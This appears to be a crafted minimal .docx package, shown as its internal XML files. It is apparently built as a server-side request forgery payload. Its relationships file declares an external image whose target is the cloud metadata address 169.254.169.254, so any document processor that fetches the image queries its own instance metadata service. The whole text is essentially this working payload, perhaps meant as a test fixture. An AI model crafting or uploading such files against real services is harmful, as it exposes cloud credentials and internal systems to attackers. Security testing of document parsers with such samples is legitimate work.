
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types/>
</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<document/>
</file>

<file path=word/_rels/document.xml.rels><Relationships><Relationship Type="image" TargetMode="External" Target="http://169.254.169.254/latest"/></Relationships>
</file>